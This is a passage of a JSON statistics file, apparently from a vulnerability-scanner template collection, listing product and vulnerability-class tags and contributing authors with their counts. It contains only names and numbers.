resco","count":2},{"name":"akamai","count":2},{"name":"electron","count":2},{"name":"openfire","count":2},{"name":"cyberoam","count":2},{"name":"ericsson","count":2},{"name":"commax","count":2},{"name":"rocketchat","count":2},{"name":"watchguard","count":2},{"name":"pgadmin","count":2},{"name":"pfsense","count":2},{"name":"mantisbt","count":2},{"name":"wooyun","count":2},{"name":"tongda","count":2},{"name":"azkaban","count":2},{"name":"apereo","count":2},{"name":"shenyu","count":2},{"name":"forcepoint","count":2},{"name":"cgi","count":2},{"name":"idea","count":2},{"name":"dvwa","count":2},{"name":"otobo","count":2},{"name":"syslog","count":2},{"name":"circontrol","count":2},{"name":"rosariosis","count":2},{"name":"pulse","count":2},{"name":"gitea","count":2},{"name":"impresscms","count":2},{"name":"graphite","count":2},{"name":"mobileiron","count":2},{"name":"iptime","count":2},{"name":"resourcespace","count":2},{"name":"sequoiadb","count":2},{"name":"favicon","count":2},{"name":"intercom","count":2},{"name":"digitalrebar","count":2},{"name":"seeddms","count":2},{"name":"chyrp","count":2},{"name":"saltstack","count":2},{"name":"hubspot","count":2},{"name":"s3","count":2},{"name":"plastic","count":2},{"name":"nagios","count":2},{"name":"chiyu","count":2},{"name":"seowon","count":2},{"name":"guacamole","count":2},{"name":"xxljob","count":2},{"name":"tileserver","count":2},{"name":"ghost","count":2},{"name":"homematic","count":2},{"name":"tableau","count":2},{"name":"sdwan","count":2},{"name":"domxss","count":2},{"name":"fortiweb","count":2},{"name":"hadoop","count":2},{"name":"phpcollab","count":2},{"name":"totemomail","count":2},{"name":"viewpoint","count":2},{"name":"airtame","count":2},{"name":"detect","count":2},{"name":"jmx","count":2},{"name":"tenda","count":2},{"name":"netflix","count":2},{"name":"tapestry","count":2},{"name":"servicenow","count":2},{"name":"octoprint","count":2},{"name":"pam","count":2},{"name":"casdoor","count":2},{"name":"xweb500","count":2},{"name":"cocoon","count":2},{"name":"aruba","count":2},{"name":"jquery","count":2},{"name":"middleware","count":2},{"name":"qihang","count":2},{"name":"idrac","count":2},{"name":"craftcms","count":2},{"name":"projectsend","count":2},{"name":"shellshock","count":2},{"name":"netdata","count":2},{"name":"embed","count":2},{"name":"smartstore","count":2},{"name":"mbean","count":2},{"name":"hiveos","count":2},{"name":"codeigniter","count":2},{"name":"sysaid","count":2},{"name":"rackstation","count":2},{"name":"lighttpd","count":2},{"name":"metersphere","count":2},{"name":"kafdrop","count":2},{"name":"ucmdb","count":2},{"name":"jitsi","count":2},{"name":"harbor","count":2},{"name":"bmc","count":2},{"name":"getsimple","count":2},{"name":"globaldomains","count":2},{"name":"checkpoint","count":2},{"name":"kiwitcms","count":2},{"name":"liferay","count":2},{"name":"nasos","count":2},{"name":"accela","count":2},{"name":"umbraco","count":2},{"name":"horde","count":2},{"name":"frp","count":2},{"name":"webcam","count":2},{"name":"gophish","count":2},{"name":"key","count":2},{"name":"ebook","count":2},{"name":"hasura","count":2},{"name":"erxes","count":2},{"name":"flir","count":2},{"name":"ruckus","count":2},{"name":"gespage","count":2},{"name":"openvpn","count":2},{"name":"qcubed","count":2},{"name":"netis","count":2},{"name":"spark","count":2},{"name":"digitalocean","count":2},{"name":"node-red-dashboard","count":2},{"name":"ec2","count":2},{"name":"mysql","count":2},{"name":"phpshowtime","count":2},{"name":"gradle","count":2},{"name":"waf","count":2},{"name":"hjtcloud","count":2},{"name":"skycaiji","count":2},{"name":"akkadian","count":2},{"name":"bitly","count":2},{"name":"lenovo","count":1},{"name":"kingdee","count":1},{"name":"k8","count":1},{"name":"alertmanager","count":1},{"name":"noptin","count":1},{"name":"turbocrm","count":1},{"name":"scalar","count":1},{"name":"hivemanager","count":1},{"name":"servicedesk","count":1},{"name":"matomo","count":1},{"name":"joget","count":1},{"name":"stem","count":1},{"name":"mkdocs","count":1},{"name":"netbiblio","count":1},{"name":"onelogin","count":1},{"name":"buildkite","count":1},{"name":"panasonic","count":1},{"name":"okta","count":1},{"name":"ubnt","count":1},{"name":"lotuscms","count":1},{"name":"version","count":1},{"name":"redmine","count":1},{"name":"securepoint","count":1},{"name":"secmail","count":1},{"name":"mspcontrol","count":1},{"name":"cx","count":1},{"name":"viewlinc","count":1},{"name":"yongyou","count":1},{"name":"wowza","count":1},{"name":"tensorflow","count":1},{"name":"launchdarkly","count":1},{"name":"mod-proxy","count":1},{"name":"tcexam","count":1},{"name":"uwsgi","count":1},{"name":"fedora","count":1},{"name":"bhagavadgita","count":1},{"name":"wazuh","count":1},{"name":"solarlog","count":1},{"name":"mpsec","count":1},{"name":"faraday","count":1},{"name":"sls","count":1},{"name":"quip","count":1},{"name":"bingmaps","count":1},{"name":"memory-pipes","count":1},{"name":"directions","count":1},{"name":"yopass","count":1},{"name":"opensearch","count":1},{"name":"blue-ocean","count":1},{"name":"zenphoto","count":1},{"name":"barracuda","count":1},{"name":"monitorix","count":1},{"name":"dbt","count":1},{"name":"geolocation","count":1},{"name":"zms","count":1},{"name":"cofense","count":1},{"name":"issabel","count":1},{"name":"intellect","count":1},{"name":"sourcebans","count":1},{"name":"gsoap","count":1},{"name":"tensorboard","count":1},{"name":"learnpress","count":1},{"name":"krweb","count":1},{"name":"gateone","count":1},{"name":"cooperhewitt","count":1},{"name":"bedita","count":1},{"name":"tika","count":1},{"name":"webpconverter","count":1},{"name":"catfishcms","count":1},{"name":"fleet","count":1},{"name":"netbeans","count":1},{"name":"roads","count":1},{"name":"dropbox","count":1},{"name":"tor","count":1},{"name":"synapse","count":1},{"name":"newrelic","count":1},{"name":"istat","count":1},{"name":"yishaadmin","count":1},{"name":"arl","count":1},{"name":"geoserver","count":1},{"name":"trane","count":1},{"name":"sofneta","count":1},{"name":"ymhome","count":1},{"name":"ilo4","count":1},{"name":"pyramid","count":1},{"name":"webmail","count":1},{"name":"ucs","count":1},{"name":"goahead","count":1},{"name":"franklinfueling","count":1},{"name":"visionhub","count":1},{"name":"loganalyzer","count":1},{"name":"argussurveillance","count":1},{"name":"triconsole","count":1},{"name":"ueditor","count":1},{"name":"ninjaform","count":1},{"name":"vscode","count":1},{"name":"autocomplete","count":1},{"name":"raspberrymatic","count":1},{"name":"cve2001","count":1},{"name":"slstudio","count":1},{"name":"avada","count":1},{"name":"dotclear","count":1},{"name":"tpshop","count":1},{"name":"prestahome","count":1},{"name":"synnefo","count":1},{"name":"opentsdb","count":1},{"name":"moin","count":1},{"name":"gpon","count":1},{"name":"prototype","count":1},{"name":"huemagic","count":1},{"name":"nordex","count":1},{"name":"dnn","count":1},{"name":"locations","count":1},{"name":"discourse","count":1},{"name":"eibiz","count":1},{"name":"cloudron","count":1},{"name":"intelliflash","count":1},{"name":"dnssec","count":1},{"name":"tinymce","count":1},{"name":"phabricator","count":1},{"name":"blockchain","count":1},{"name":"purestorage","count":1},{"name":"alltube","count":1},{"name":"dasan","count":1},{"name":"pihole","count":1},{"name":"pieregister","count":1},{"name":"saml","count":1},{"name":"holidayapi","count":1},{"name":"phpfastcache","count":1},{"name":"majordomo2","count":1},{"name":"contentkeeper","count":1},{"name":"finereport","count":1},{"name":"workspace","count":1},{"name":"myanimelist","count":1},{"name":"smi","count":1},{"name":"haproxy","count":1},{"name":"zzzphp","count":1},{"name":"foss","count":1},{"name":"cerebro","count":1},{"name":"springframework","count":1},{"name":"placeos","count":1},{"name":"clustering","count":1},{"name":"drone","count":1},{"name":"jwt","count":1},{"name":"adfs","count":1},{"name":"primetek","count":1},{"name":"clearbit","count":1},{"name":"playable","count":1},{"name":"emby","count":1},{"name":"crestron","count":1},{"name":"mojoauth","count":1},{"name":"csrfguard","count":1},{"name":"cve2002","count":1},{"name":"edgemax","count":1},{"name":"etherscan","count":1},{"name":"eprints","count":1},{"name":"ssltls","count":1},{"name":"caseaware","count":1},{"name":"urlscan","count":1},{"name":"zenario","count":1},{"name":"dixell","count":1},{"name":"iserver","count":1},{"name":"pippoint","count":1},{"name":"rmc","count":1},{"name":"esxi","count":1},{"name":"h5sconsole","count":1},{"name":"console","count":1},{"name":"pinata","count":1},{"name":"vision","count":1},{"name":"polarisft","count":1},{"name":"zoomsounds","count":1},{"name":"hdnetwork","count":1},{"name":"ecosys","count":1},{"name":"apiman","count":1},{"name":"commscope","count":1},{"name":"f5","count":1},{"name":"weiphp","count":1},{"name":"oki","count":1},{"name":"upnp","count":1},{"name":"cobub","count":1},{"name":"xampp","count":1},{"name":"gsm","count":1},{"name":"eyoumail","count":1},{"name":"parentlink","count":1},{"name":"webeditors","count":1},{"name":"virustotal","count":1},{"name":"nexusdb","count":1},{"name":"whm","count":1},{"name":"wavemaker","count":1},{"name":"ixbusweb","count":1},{"name":"contactform","count":1},{"name":"office365","count":1},{"name":"clockwork","count":1},{"name":"pan","count":1},{"name":"elevation","count":1},{"name":"submitty","count":1},{"name":"workresources","count":1},{"name":"caddy","count":1},{"name":"javafaces","count":1},{"name":"shoretel","count":1},{"name":"biqsdrive","count":1},{"name":"skywalking","count":1},{"name":"pollbot","count":1},{"name":"php-fusion","count":1},{"name":"pods","count":1},{"name":"gnuboard","count":1},{"name":"diris","count":1},{"name":"nps","count":1},{"name":"short.io","count":1},{"name":"timezone","count":1},{"name":"emerson","count":1},{"name":"idera","count":1},{"name":"supervisor","count":1},{"name":"webui","count":1},{"name":"zuul","count":1},{"name":"anchorcms","count":1},{"name":"eyelock","count":1},{"name":"express","count":1},{"name":"kodi","count":1},{"name":"objectinjection","count":1},{"name":"totaljs","count":1},{"name":"accent","count":1},{"name":"lancom","count":1},{"name":"stridercd","count":1},{"name":"fastapi","count":1},{"name":"stackstorm","count":1},{"name":"zmanda","count":1},{"name":"spectracom","count":1},{"name":"yaws","count":1},{"name":"tugboat","count":1},{"name":"meraki","count":1},{"name":"txt","count":1},{"name":"open-redirect","count":1},{"name":"neo4j","count":1},{"name":"leanix","count":1},{"name":"goanywhere","count":1},{"name":"blueiris","count":1},{"name":"sterling","count":1},{"name":"shoppable","count":1},{"name":"adb","count":1},{"name":"richfaces","count":1},{"name":"pirelli","count":1},{"name":"meshcentral","count":1},{"name":"clink-office","count":1},{"name":"yealink","count":1},{"name":"grails","count":1},{"name":"eyesofnetwork","count":1},{"name":"vsftpd","count":1},{"name":"deviantart","count":1},{"name":"mantis","count":1},{"name":"securityspy","count":1},{"name":"aura","count":1},{"name":"remkon","count":1},{"name":"zoneminder","count":1},{"name":"mongo-express","count":1},{"name":"ocs-inventory","count":1},{"name":"myvuehelp","count":1},{"name":"interactsh","count":1},{"name":"web3storage","count":1},{"name":"distance","count":1},{"name":"ns","count":1},{"name":"smartblog","count":1},{"name":"spotify","count":1},{"name":"csod","count":1},{"name":"concourse","count":1},{"name":"google-earth","count":1},{"name":"beanstalk","count":1},{"name":"tplink","count":1},{"name":"apple","count":1},{"name":"buddy","count":1},{"name":"nimble","count":1},{"name":"jenzabar","count":1},{"name":"threatq","count":1},{"name":"rubedo","count":1},{"name":"hiawatha","count":1},{"name":"covalent","count":1},{"name":"qvisdvr","count":1},{"name":"graphiql","count":1},{"name":"micro-user-service","count":1},{"name":"strava","count":1},{"name":"lg-nas","count":1},{"name":"tekon","count":1},{"name":"discord","count":1},{"name":"visualstudio","count":1},{"name":"kvm","count":1},{"name":"hirak","count":1},{"name":"shadoweb","count":1},{"name":"zcms","count":1},{"name":"twitter-server","count":1},{"name":"wiki","count":1},{"name":"prismaweb","count":1},{"name":"asana","count":1},{"name":"pagerduty","count":1},{"name":"petfinder","count":1},{"name":"fms","count":1},{"name":"suprema","count":1},{"name":"gerapy","count":1},{"name":"clave","count":1},{"name":"abuseipdb","count":1},{"name":"etcd","count":1},{"name":"groupoffice","count":1},{"name":"powercreator","count":1},{"name":"h3c-imc","count":1},{"name":"nomad","count":1},{"name":"spip","count":1},{"name":"timesheet","count":1},{"name":"netmask","count":1},{"name":"dvdFab","count":1},{"name":"aspnuke","count":1},{"name":"wallix","count":1},{"name":"server","count":1},{"name":"helpdesk","count":1},{"name":"sunflower","count":1},{"name":"nearby","count":1},{"name":"visualtools","count":1},{"name":"gunicorn","count":1},{"name":"landrayoa","count":1},{"name":"kodexplorer","count":1},{"name":"karma","count":1},{"name":"dom","count":1},{"name":"labtech","count":1},{"name":"mastodon","count":1},{"name":"exponentcms","count":1},{"name":"maxsite","count":1},{"name":"glowroot","count":1},{"name":"festivo","count":1},{"name":"thinkserver","count":1},{"name":"ulterius","count":1},{"name":"graylog","count":1},{"name":"icinga","count":1},{"name":"bitrise","count":1},{"name":"processwire","count":1},{"name":"wix","count":1},{"name":"cron","count":1},{"name":"ddownload","count":1},{"name":"openx","count":1},{"name":"mirasys","count":1},{"name":"luftguitar","count":1},{"name":"revslider","count":1},{"name":"sitefinity","count":1},{"name":"place","count":1},{"name":"concrete5","count":1},{"name":"spiderfoot","count":1},{"name":"nc2","count":1},{"name":"openerp","count":1},{"name":"fhem","count":1},{"name":"acme","count":1},{"name":"calendarific","count":1},{"name":"cliniccases","count":1},{"name":"aniapi","count":1},{"name":"gcp","count":1},{"name":"nweb2fax","count":1},{"name":"erp-nc","count":1},{"name":"pypicloud","count":1},{"name":"ruoyi","count":1},{"name":"tinypng","count":1},{"name":"hrsale","count":1},{"name":"getgrav","count":1},{"name":"thinkadmin","count":1},{"name":"owa","count":1},{"name":"travis","count":1},{"name":"plone","count":1},{"name":"sprintful","count":1},{"name":"apigee","count":1},{"name":"accuweather","count":1},{"name":"tink","count":1},{"name":"admidio","count":1},{"name":"vanguard","count":1},{"name":"oidc","count":1},{"name":"timeclock","count":1},{"name":"svn","count":1},{"name":"coinlayer","count":1},{"name":"geocode","count":1},{"name":"alchemy","count":1},{"name":"cors","count":1},{"name":"unifi","count":1},{"name":"comodo","count":1},{"name":"axiom","count":1},{"name":"kerio","count":1},{"name":"trilithic","count":1},{"name":"ganglia","count":1},{"name":"sast","count":1},{"name":"jinfornet","count":1},{"name":"xml","count":1},{"name":"processmaker","count":1},{"name":"darkstat","count":1},{"name":"shopxo","count":1},{"name":"jupyterhub","count":1},{"name":"avatier","count":1},{"name":"xvr","count":1},{"name":"comfortel","count":1},{"name":"whmcs","count":1},{"name":"clockwatch","count":1},{"name":"jaspersoft","count":1},{"name":"siebel","count":1},{"name":"knowage","count":1},{"name":"yarn","count":1},{"name":"mdm","count":1},{"name":"jeecg-boot","count":1},{"name":"billquick","count":1},{"name":"nownodes","count":1},{"name":"xdcms","count":1},{"name":"jsp","count":1},{"name":"wavlink","count":1},{"name":"ipvpn","count":1},{"name":"caa","count":1},{"name":"roundcube","count":1},{"name":"opnsense","count":1},{"name":"perl","count":1},{"name":"eventtickets","count":1},{"name":"kindeditor","count":1},{"name":"domino","count":1},{"name":"limit","count":1},{"name":"zookeeper","count":1},{"name":"redcap","count":1},{"name":"eg","count":1},{"name":"markdown","count":1},{"name":"gstorage","count":1},{"name":"thedogapi","count":1},{"name":"hanwang","count":1},{"name":"rudloff","count":1},{"name":"fortressaircraft","count":1},{"name":"seopanel","count":1},{"name":"mara","count":1},{"name":"dwsync","count":1},{"name":"daybyday","count":1},{"name":"fanwei","count":1},{"name":"books","count":1},{"name":"gocron","count":1},{"name":"opm","count":1},{"name":"malshare","count":1},{"name":"kyan","count":1},{"name":"youtube","count":1},{"name":"biostar2","count":1},{"name":"viaware","count":1},{"name":"duomicms","count":1},{"name":"oliver","count":1},{"name":"quantum","count":1},{"name":"zend","count":1},{"name":"gofile","count":1},{"name":"gemweb","count":1},{"name":"aerohive","count":1},{"name":"cassandra","count":1},{"name":"moinmoin","count":1},{"name":"minimouse","count":1},{"name":"routeros","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"tracer","count":1},{"name":"salesforce","count":1},{"name":"dolphinscheduler","count":1},{"name":"xiuno","count":1},{"name":"xmpp","count":1},{"name":"binance","count":1},{"name":"bible","count":1},{"name":"xunchi","count":1},{"name":"announcekit","count":1},{"name":"asus","count":1},{"name":"satellian","count":1},{"name":"monitorr","count":1},{"name":"block","count":1},{"name":"kronos","count":1},{"name":"opensso","count":1},{"name":"geddy","count":1},{"name":"imap","count":1},{"name":"chinaunicom","count":1},{"name":"microcomputers","count":1},{"name":"svnserve","count":1},{"name":"restler","count":1},{"name":"phpunit","count":1},{"name":"malwarebazaar","count":1},{"name":"planon","count":1},{"name":"hiboss","count":1},{"name":"adiscon","count":1},{"name":"bookstack","count":1},{"name":"pulsesecure","count":1},{"name":"find","count":1},{"name":"mailboxvalidator","count":1},{"name":"dvr","count":1},{"name":"fatwire","count":1},{"name":"sso","count":1},{"name":"chronoforums","count":1},{"name":"sucuri","count":1},{"name":"apos","count":1},{"name":"ebird","count":1},{"name":"shiro","count":1},{"name":"blackboard","count":1},{"name":"jabber","count":1},{"name":"dokuwiki","count":1},{"name":"instatus","count":1},{"name":"ewebs","count":1},{"name":"avalanche","count":1},{"name":"karel","count":1},{"name":"tjws","count":1},{"name":"cvnd2018","count":1},{"name":"extreme","count":1},{"name":"oneblog","count":1},{"name":"scanii","count":1},{"name":"cybrotech","count":1},{"name":"rwebserver","count":1},{"name":"cve2021wordpress","count":1},{"name":"74cms","count":1},{"name":"tieline","count":1},{"name":"esmtp","count":1},{"name":"projector","count":1},{"name":"b2bbuilder","count":1},{"name":"pyspider","count":1},{"name":"optiLink","count":1},{"name":"magicflow","count":1},{"name":"musicstore","count":1},{"name":"simplecrm","count":1},{"name":"froxlor","count":1},{"name":"faust","count":1},{"name":"calendarix","count":1},{"name":"elementor","count":1},{"name":"lutron","count":1},{"name":"natemail","count":1},{"name":"appveyor","count":1},{"name":"dreamweaver","count":1},{"name":"livezilla","count":1},{"name":"casemanager","count":1},{"name":"h2","count":1},{"name":"europeana","count":1},{"name":"wago","count":1},{"name":"jreport","count":1},{"name":"sassy","count":1},{"name":"secnet-ac","count":1},{"name":"scimono","count":1},{"name":"tamronos","count":1},{"name":"racksnet","count":1},{"name":"opengear","count":1},{"name":"h5s","count":1},{"name":"webex","count":1},{"name":"harvardart","count":1},{"name":"crm","count":1},{"name":"securenvoy","count":1},{"name":"lanproxy","count":1},{"name":"octobercms","count":1},{"name":"containers","count":1},{"name":"superwebmailer","count":1},{"name":"coinranking","count":1},{"name":"droneci","count":1},{"name":"gloo","count":1},{"name":"email","count":1},{"name":"sonarcloud","count":1},{"name":"dribbble","count":1},{"name":"buttercms","count":1},{"name":"shopizer","count":1},{"name":"dss","count":1},{"name":"softaculous","count":1},{"name":"feifeicms","count":1},{"name":"websvn","count":1},{"name":"emc","count":1},{"name":"memcached","count":1},{"name":"dericam","count":1},{"name":"clickhouse","count":1},{"name":"directum","count":1},{"name":"qualcomm","count":1},{"name":"jeewms","count":1},{"name":"cofax","count":1},{"name":"pendo","count":1},{"name":"veeam","count":1},{"name":"portainer","count":1},{"name":"soar","count":1},{"name":"loqate","count":1},{"name":"rujjie","count":1},{"name":"dahua","count":1},{"name":"struts2","count":1},{"name":"rainloop","count":1},{"name":"mofi","count":1},{"name":"overflow","count":1},{"name":"cve2004","count":1},{"name":"b2evolution","count":1},{"name":"totolink","count":1},{"name":"wifisky","count":1},{"name":"nerdgraph","count":1},{"name":"wordcloud","count":1},{"name":"scs","count":1},{"name":"ecshop","count":1},{"name":"shortcode","count":1},{"name":"tectuus","count":1},{"name":"nette","count":1},{"name":"smartsense","count":1},{"name":"easyappointments","count":1},{"name":"cscart","count":1},{"name":"doh","count":1},{"name":"expressjs","count":1},{"name":"sauter","count":1},{"name":"chevereto","count":1},{"name":"gurock","count":1},{"name":"fortilogger","count":1},{"name":"olivetti","count":1},{"name":"ncomputing","count":1},{"name":"openresty","count":1},{"name":"appweb","count":1},{"name":"mongoshake","count":1},{"name":"eyou","count":1},{"name":"slocum","count":1},{"name":"sceditor","count":1},{"name":"openweather","count":1},{"name":"particle","count":1},{"name":"fontawesome","count":1},{"name":"addpac","count":1},{"name":"taiga","count":1},{"name":"basic-auth","count":1},{"name":"details","count":1},{"name":"weglot","count":1},{"name":"teradici","count":1},{"name":"wmt","count":1},{"name":"default","count":1},{"name":"webmodule-ee","count":1},{"name":"phalcon","count":1},{"name":"alquist","count":1},{"name":"pmb","count":1},{"name":"cherokee","count":1},{"name":"piluscart","count":1},{"name":"ignition","count":1},{"name":"jenkin","count":1},{"name":"livehelperchat","count":1},{"name":"iframe","count":1},{"name":"omi","count":1},{"name":"phpfusion","count":1},{"name":"dwr","count":1},{"name":"activeadmin","count":1},{"name":"netrc","count":1},{"name":"mtheme","count":1},{"name":"amcrest","count":1},{"name":"browserless","count":1},{"name":"u8","count":1},{"name":"zeppelin","count":1},{"name":"zipkin","count":1},{"name":"piwigo","count":1},{"name":"varnish","count":1},{"name":"idor","count":1},{"name":"antsword","count":1},{"name":"cse","count":1},{"name":"spinnaker","count":1},{"name":"fcm","count":1},{"name":"adoptapet","count":1},{"name":"hortonworks","count":1},{"name":"mariadb","count":1},{"name":"cucm","count":1},{"name":"zm","count":1},{"name":"xproxy","count":1},{"name":"checkmarx","count":1},{"name":"admin","count":1},{"name":"zarafa","count":1},{"name":"semaphore","count":1},{"name":"argocd","count":1},{"name":"edgeos","count":1},{"name":"tuxedo","count":1},{"name":"sgp","count":1},{"name":"huijietong","count":1},{"name":"guppy","count":1},{"name":"mappress","count":1},{"name":"bullwark","count":1},{"name":"camunda","count":1},{"name":"identityguard","count":1},{"name":"xoops","count":1},{"name":"ixcache","count":1},{"name":"idemia","count":1},{"name":"szhe","count":1},{"name":"xds","count":1},{"name":"fiori","count":1},{"name":"klog","count":1},{"name":"sponip","count":1},{"name":"mrtg","count":1},{"name":"abbott","count":1},{"name":"okiko","count":1},{"name":"oauth2","count":1},{"name":"ldap","count":1},{"name":"bash","count":1},{"name":"beanshell","count":1},{"name":"mdb","count":1},{"name":"epm","count":1},{"name":"couchcms","count":1},{"name":"route","count":1},{"name":"redwood","count":1},{"name":"sco","count":1},{"name":"bonita","count":1},{"name":"twig","count":1},{"name":"iceflow","count":1},{"name":"razor","count":1},{"name":"leostream","count":1},{"name":"pagespeed","count":1},{"name":"axxonsoft","count":1},{"name":"netgenie","count":1},{"name":"directadmin","count":1},{"name":"formalms","count":1},{"name":"dotnet","count":1},{"name":"sourcecodester","count":1},{"name":"tufin","count":1},{"name":"jinher","count":1},{"name":"mapbox","count":1},{"name":"gateway","count":1},{"name":"manager","count":1},{"name":"delta","count":1},{"name":"loytec","count":1},{"name":"acontent","count":1},{"name":"portal","count":1},{"name":"AlphaWeb","count":1},{"name":"formcraft3","count":1},{"name":"jumpcloud","count":1},{"name":"ptr","count":1},{"name":"siemens","count":1},{"name":"alerta","count":1},{"name":"feedwordpress","count":1},{"name":"etherpad","count":1},{"name":"bing","count":1},{"name":"gilacms","count":1},{"name":"nsasg","count":1},{"name":"abstractapi","count":1},{"name":"mozilla","count":1},{"name":"dicoogle","count":1},{"name":"qizhi","count":1},{"name":"yachtcontrol","count":1},{"name":"saltapi","count":1},{"name":"floc","count":1},{"name":"raspap","count":1},{"name":"st","count":1},{"name":"bazarr","count":1},{"name":"logontracer","count":1},{"name":"secret","count":1},{"name":"web-dispatcher","count":1},{"name":"socomec","count":1},{"name":"robomongo","count":1},{"name":"expose","count":1},{"name":"cve2000","count":1},{"name":"babel","count":1},{"name":"lacie","count":1},{"name":"aims","count":1},{"name":"emessage","count":1},{"name":"phpwiki","count":1},{"name":"yzmcms","count":1},{"name":"smuggling","count":1},{"name":"newsletter","count":1},{"name":"novnc","count":1},{"name":"landray","count":1},{"name":"bigfix","count":1},{"name":"rmi","count":1},{"name":"iconfinder","count":1},{"name":"webctrl","count":1},{"name":"apcu","count":1},{"name":"tianqing","count":1},{"name":"kerbynet","count":1},{"name":"ssi","count":1},{"name":"webftp","count":1},{"name":"clansphere","count":1},{"name":"wildfly","count":1},{"name":"htmli","count":1},{"name":"eyoucms","count":1},{"name":"goip","count":1},{"name":"qsan","count":1},{"name":"wakatime","count":1},{"name":"tarantella","count":1},{"name":"calendly","count":1},{"name":"smartsheet","count":1},{"name":"sage","count":1},{"name":"centreon","count":1},{"name":"radius","count":1},{"name":"incapptic-connect","count":1},{"name":"atvise","count":1},{"name":"rsa","count":1},{"name":"cname","count":1},{"name":"strider","count":1},{"name":"codemeter","count":1},{"name":"trello","count":1},{"name":"honeypot","count":1},{"name":"achecker","count":1},{"name":"thecatapi","count":1},{"name":"blockfrost","count":1},{"name":"zentral","count":1},{"name":"opensmtpd","count":1},{"name":"activecollab","count":1},{"name":"biometrics","count":1},{"name":"pivotaltracker","count":1},{"name":"kenesto","count":1},{"name":"cgit","count":1},{"name":"realteo","count":1},{"name":"lionwiki","count":1},{"name":"onkyo","count":1},{"name":"paneil","count":1},{"name":"qdpm","count":1},{"name":"fortigates","count":1},{"name":"ipstack","count":1},{"name":"streetview","count":1},{"name":"mx","count":1},{"name":"etouch","count":1},{"name":"librenms","count":1},{"name":"api-manager","count":1},{"name":"ucp","count":1},{"name":"nutanix","count":1},{"name":"commvault","count":1},{"name":"weboftrust","count":1},{"name":"nifi","count":1},{"name":"werkzeug","count":1},{"name":"emlog","count":1},{"name":"csa","count":1},{"name":"ricoh","count":1},{"name":"speed","count":1},{"name":"acexy","count":1},{"name":"unisharp","count":1},{"name":"orbintelligence","count":1},{"name":"bitquery","count":1},{"name":"rijksmuseum","count":1},{"name":"xamr","count":1},{"name":"defectdojo","count":1},{"name":"solman","count":1},{"name":"adminset","count":1},{"name":"flowci","count":1},{"name":"charity","count":1},{"name":"dbeaver","count":1},{"name":"vercel","count":1},{"name":"ncbi","count":1},{"name":"lfw","count":1},{"name":"dompdf","count":1},{"name":"hue","count":1},{"name":"boa","count":1},{"name":"hanming","count":1},{"name":"redhat","count":1},{"name":"primefaces","count":1},{"name":"micro","count":1},{"name":"intellislot","count":1},{"name":"hetzner","count":1},{"name":"sar2html","count":1},{"name":"kramer","count":1},{"name":"ecom","count":1},{"name":"flexbe","count":1},{"name":"bitcoinaverage","count":1},{"name":"web-suite","count":1},{"name":"opencart","count":1},{"name":"secnet","count":1},{"name":"buildbot","count":1},{"name":"spidercontrol","count":1},{"name":"vnc","count":1},{"name":"wondercms","count":1},{"name":"testrail","count":1},{"name":"lumis","count":1},{"name":"opensns","count":1},{"name":"improvmx","count":1},{"name":"lokalise","count":1},{"name":"adafruit","count":1},{"name":"xmlchart","count":1},{"name":"vsphere","count":1},{"name":"opencast","count":1},{"name":"sureline","count":1},{"name":"netweaver","count":1},{"name":"oscommerce","count":1},{"name":"asanhamayesh","count":1},{"name":"spf","count":1},{"name":"flask","count":1},{"name":"inspur","count":1},{"name":"iterable","count":1},{"name":"optimizely","count":1},{"name":"fastcgi","count":1},{"name":"rhymix","count":1},{"name":"geutebruck","count":1},{"name":"mautic","count":1},{"name":"maccmsv10","count":1},{"name":"plc","count":1},{"name":"instagram","count":1},{"name":"bravenewcoin","count":1},{"name":"mediumish","count":1},{"name":"nedi","count":1},{"name":"barco","count":1},{"name":"connect-central","count":1},{"name":"interlib","count":1},{"name":"rdp","count":1},{"name":"bolt","count":1},{"name":"shindig","count":1},{"name":"postmark","count":1},{"name":"ioncube","count":1},{"name":"burp","count":1},{"name":"stytch","count":1},{"name":"sarg","count":1},{"name":"oam","count":1},{"name":"jnoj","count":1},{"name":"gridx","count":1},{"name":"box","count":1},{"name":"vms","count":1},{"name":"keenetic","count":1},{"name":"coinmarketcap","count":1},{"name":"webalizer","count":1},{"name":"rsyncd","count":1},{"name":"cloudera","count":1},{"name":"episerver","count":1},{"name":"shopware","count":1},{"name":"acsoft","count":1},{"name":"superset","count":1},{"name":"acemanager","count":1},{"name":"postgres","count":1},{"name":"myucms","count":1},{"name":"phoronix","count":1},{"name":"wing-ftp","count":1},{"name":"wdja","count":1},{"name":"allied","count":1},{"name":"kubeflow","count":1},{"name":"snipeit","count":1},{"name":"telecom","count":1},{"name":"iucn","count":1},{"name":"fastly","count":1},{"name":"kyocera","count":1},{"name":"extractor","count":1},{"name":"osquery","count":1},{"name":"teltonika","count":1},{"name":"coinapi","count":1},{"name":"siteomat","count":1},{"name":"ntopng","count":1},{"name":"starttls","count":1},{"name":"pastebin","count":1}],"authors":[{"name":"daffainfo","count":560},{"name":"dhiyaneshdk","count":421},{"name":"pikpikcu","count":316},{"name":"pdteam","count":262},{"name":"geeknik","count":178},{"name":"dwisiswant0","count":167},{"name":"princechaddha","count":130},{"name":"0x_akoko","count":128},{"name":"gy741","count":117},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":46},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"ritikchaddha","count":35},{"name":"adam crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"akincibor","count":16},{"name":"pr3r00t","count":15},{"name":"for3stco1d","count":15},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":14},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"sharath","count":13},{"name":"sullo","count":12},{"name":"suman_kar","count":12},{"name":"melbadry9","count":11},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"alph4byt3","count":10},{"name":"johnk3r","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"dogasantos","count":9},{"name":"emadshanab","count":9},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"randomstr1ng","count":7},{"name":"edoardottt","count":7},{"name":"random-robbie","count":7},{"name":"logicalhunter","count":7},{"name":"kophjager007","count":7},{"name":"techryptic 